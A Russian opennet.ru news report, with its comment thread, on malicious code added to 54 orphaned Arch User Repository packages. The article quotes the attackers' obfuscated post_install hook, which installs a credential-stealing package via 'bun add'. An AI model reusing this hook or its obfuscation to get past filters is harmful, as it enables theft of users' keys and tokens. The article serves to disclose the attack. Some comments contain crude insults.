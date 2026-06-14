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В AUR осуществлена подстановка вредоносного кода ещё в 54 пакета

14.06.2026 14:41 (MSK)

Несмотря на меры, предпринятые разработчиками Arch Linux, деятельность по подстановке вредоносного кода в репозитории AUR (Arch User Repository) не остановлена. Несколько часов назад вредносный код подставлен ещё в 54 пакета, оставшихся без сопровождающих (история отмены вредоносных правок). В отличие от позавчерашних атак, вместо пакетного менеджера npm для установки вредоносных зависимостей на этот раз задействована платформа bun. Для обхода реализованных фильтров в функцию post_install вставляется обфусцированная строка, в которой вызывается команда "bun add" для установки пакетов с вредоносным кодом, осуществляющим сканирование и отправку на внешний сервер ключей, токенов и учётных данных. 


   post_install() {
       $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
   }

Дополнение: Зафиксирована ещё одна атака на AUR, на этот раз вместо подстановки вредоносного ПО в несколько десятков пакетов, оставшихся без сопровождающего, был добавлен вывод нецензурного сообщения на русском языке с оскорблением пользователей и предложением поменять дистрибутив или перестать использовать AUR.

  1. Главная ссылка к новости (https://lists.archlinux.org/ar...)
  2. OpenNews: Атакующие скомпрометировали 1577 пакетов в репозитории AUR
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/65685-aur
Ключевые слова: aur, arch, malware, bun
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (44) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, ы (?), 14:52, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    > AUR
    > @
    > looks inside
    > @
    > npm

    well...

     
  • 1.2, Аноним (2), 15:01, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –3 +/
    А зачем вообще аур сегодня? Актуально было 20 лет назад, потому что rpm собирать было ещё той канителью и тут простой сборочный скрипт. Но аур всегда был помойкой.
     
     
  • 2.28, не ной (?), 17:43, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    ты в помойках шаришь
     
  • 2.33, Комиссар (?), 18:05, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну так АУР это не всегда перепаковка deb/rpm. Иногда это еще сборка из сырцов или перефасовка appimage. И как следствие — своевременные обновления без многогигабайтных зависимостей.
     
  • 2.39, Аноним (39), 18:13, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Все еще. Особенно ядро патченное
     

  • 1.3, Аноним (3), 15:03, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    может проблема не в aur, а в npm например?
     
     
  • 2.9, Аноним (9), 15:51, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Крутая логика. Дом вскрыли монтировкой, потому что там не было замка, камер и систем защиты. Вывод - виноваты монтировки.
     
  • 2.22, Аноним (22), 16:50, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > может проблема не в aur, а в npm например?

    Тем временем в новости:

    > в этот раз задействована платформа bun

    Да, проблема в npm. 🤦

     

  • 1.4, Аноним (4), 15:10, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –3 +/
    AUR ВСЁ !
     
     
  • 2.6, bitman (??), 15:25, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    не AUR, а orphaned
     
  • 2.7, Аноним (7), 15:43, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > AUR ВСЁ !

    Не однозначное высказывание.

     

  • 1.5, Аноним (5), 15:15, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    А что, flatpack не помог?
     
     
  • 2.23, Аноним (22), 16:52, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Помог. Ведь ломают AUR, а не Flatpack. Ты даже заголовок не осилил. 🤦
     
  • 2.34, Комиссар (?), 18:06, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    А думаешь кто-то проверяет что он там устанавливает?
     

  • 1.8, Аноним (7), 15:51, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Почему заброшенные пакеты не удаляют, а передают любому желающему? Предупреждение, стандартные 30 дней не размышление, нет ответа - удаление.
     
     
  • 2.10, Аноним (2), 15:55, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    У тебя так сопровождающих не останется. А ответ это power tripping, результат никого не волнует.
     
  • 2.18, Аноним (18), 16:29, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > 30 дней не размышление

    даже в отпуск не съездить

     
  • 2.27, небесный ученый (?), 17:15, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > Почему заброшенные пакеты не удаляют

    удаляются, раз в два года
    https://wiki.archlinux.org/title/AUR_Cleanup_Day

    > а передают любому желающему?

    а почему бы и нет ?
    любой желающий может прислать пакет(точнее рецепт сборки пакета);
    любой желающий может поддерживать пакет;
    любой желающий может поднять брошенное знамя;
    минимум ограничений.
    Да риски всегда есть, отсутствие надзирателя подразумевает самодисциплину.
    Ограбить тебя могут даже в самом свободном городе в темной подворотне, но и в тюрьме где будешь под полным контролем ты не застрахован от неприятностей.


     

  • 1.11, Аноним (11), 15:56, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Зачем они это делают? На данных пользователей арча можно как-то поживиться?
     
     
  • 2.26, iPony128052 (?), 17:06, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну да.
    Тот же криптокошелёк украсть или просто плюс один к ботнету.
     
     
  • 3.31, небесный ученый (?), 18:01, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    мало вериться, в большинстве случаев пакеты(рецепты) заброшены не просто так.

    Если пакет популярен и по какой то причине мантейнер его бросает то довольно быстро(буквально дни) на него находятся желающие его сопровождать, да и плюс к таким популярным пакетам всегда повышенное внимание в плане безопасности.

    Если же пакет НЕ популярный то он может висеть месяцами а то и годами(до двух лет) как брошенный, у таких пакетов и установок минимум, думаю сильно не ошибусь если у половины из них устанавливалось только самим автором пакет(рецепта) который изначально его и прислал а потом бросил за ненадобностью.

    Думаю что из той тысячи+ зараженных пакетов, максимум это сотня "пострадавших" да и то в основном те кто когда то установили "на посмотреть" да и забыли удалить, а пакет продолжал висеть мусором. В том же yay(один из наиболее популярный аур-хелперов) при обновлении системы всегда выводиться те пакеты которые брошены, я например смотрю и если не пользуюсь то всегда удаляю, зачем держать лишний мусор в системе.
    Так вот из той "сотни", если их конечно наберется столько, криптокошелёк будет хорошо если у пары человек да и то не факт. Ботнет тоже так себе идея, риск что его погасят в зародыше довольно велик, все же арч ставить себе решаются далеко не домохозяйки, да и смысл тратить сколько времени и усилий чтобы получить сютню другую узлов, намного проще разводить в этом плане хомяков.

     

  • 1.12, АДмин (?), 15:59, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Мне вот интересно почему атаки именно на Arch ? Не Void и не NixOS а именно Arch ???  Может это личное ???
     
     
  • 2.13, Аноним (2), 16:06, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    На серверах популярен, свежий относительно стабильный софт и роллинг. Ну, есть такой миф, что сабж норм. Атака на жсников, и ты правильно можешь предположить, что жсники в него верят в силу низкой квалификации и ограниченного опыта. Впрочем, из альтернатив у тебя только Федора и это корпоративная шляпа с экспериментами, регулярно переустанавливать надо и без гарантий.
     
     
  • 3.15, anonymos (?), 16:20, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > Впрочем, из альтернатив у тебя только Федора

    Убей себя ап стену

     
  • 3.16, Аноним (4), 16:21, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    https://get.opensuse.org/ru/tumbleweed/
     
  • 2.14, Аноним (14), 16:06, 14/06/2026 Скрыто ботом-модератором     [к модератору]
    		• +/
     
  • 2.19, Аноним (19), 16:30, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Потому что дристр для школоты btw
     
  • 2.25, iPony128052 (?), 17:05, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Чем больше коэффициент популярности помноженный на дырявость - тем логичнее больше атак.

    У арча он явно выше чем у Void и NixOS

     
     
  • 3.36, Комиссар (?), 18:10, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    А при чем тут эти дубовые колымаги? Речь-то о десктопах

    Поставь-ка в эти коряги такие базовые десктоп-штуки как Steam, CoreCtrl и bluetooth — взвоешь.

     
  • 3.40, Аноним (40), 18:13, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > Чем больше коэффициент популярности

    Тем надежнее бдит 1000гл@3!

     
  • 3.44, небесный ученый (?), 18:23, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    при чем тут дырявость ? AUR "это не баг а фича", как и доброта это не порок. Тем боле везде где тока можно написано что-то типа этого:
    Warning AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.
     
     
  • 4.45, iPony128052 (?), 18:25, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > при чем тут дырявость ? AUR "это не баг а фича"

    Дырявость это не отменяет, если даже об этом написать.

     
  • 2.43, Аноним (40), 18:21, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Оно не выдержало интеллектуального превосходства арчеводов. Даже сюда в комментарии пришло и.. расплаkalось.
     
  • 2.46, Комиссар (?), 18:27, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Смотри Steam-статистику. Какие дистры там отожрали 50+%?
    Что до Void/NixOS — это тупик: для десктопа они слишком засохшие, а для прода — мало того что не продаются, не имеют оффсапорта, так еще и требуют неадекватной компетенции аникеев.
     

  • 1.17, Аноним (17), 16:25, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    npm config set ignore-scripts true
     
     
  • 2.24, Аноним (22), 16:53, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    И как это тебе поможет?
     
  • 2.41, Комиссар (?), 18:14, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    sudo pamac remove nodejs npm --orphans
     

  • 1.20, Аноним (7), 16:38, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Преступная группа идёт по пути "наибольшего" сопротивления. А почему? Вот, если понять её сверхзадачу...
     
  • 1.29, Аноним (22), 17:54, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    > Зафиксирована ещё одна атака на AUR, [...] был добавлен вывод [..] с [...] предложением поменять дистрибутив или перестать использовать AUR.

    Да бессмысленно - эта аудитория необучаема. В прошлой новости адепты Арча пели, что "нужно всего лишь смотреть, что в PKGBUILD файлах 😤".

    Доигрались в крутых хакиров, "контролирующих свою систему". Правда, хакирам никто не сказал, что запускать баш-портянки из публичной помойки - это не совсем по-хакерски. 😳

     
     
  • 2.37, Испанский стыд (?), 18:11, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Написать тебе техническое ревью на твой недопакетный менеджер? Или ты и сам всё понимаешь?
     
     
  • 3.42, Аноним (22), 18:17, 14/06/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > Написать тебе техническое ревью на твой недопакетный менеджер?

    Пиши, конечно!

     

  • 1.30, Аноним (30), 17:56, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    AUR или не AUR?... Вообще-то любой мейнтейнер может вставить в свой пакет всё что захочет. Просто если код  читают много людей они это заметят, если никто не читает, то не заметят. Но и ещё репутауция.
     
  • 1.35, Испанский стыд (?), 18:09, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > ... поставьте нормальный дистр и не позорьтесь ...

    Не позорил бы cpакир себя NEOcиляTORством Арча, учительницу русского языка и испoлнительную влaсть РФ - что до сих пор к mamке за ухо не отвели.

     
  • 1.38, Аноним (38), 18:12, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    >вывод нецензурного сообщения на русском языке

    Сообщение с обращением на "вы", "хотяб" написано слитно. Какой-то нерусскоязычный деятель.

     

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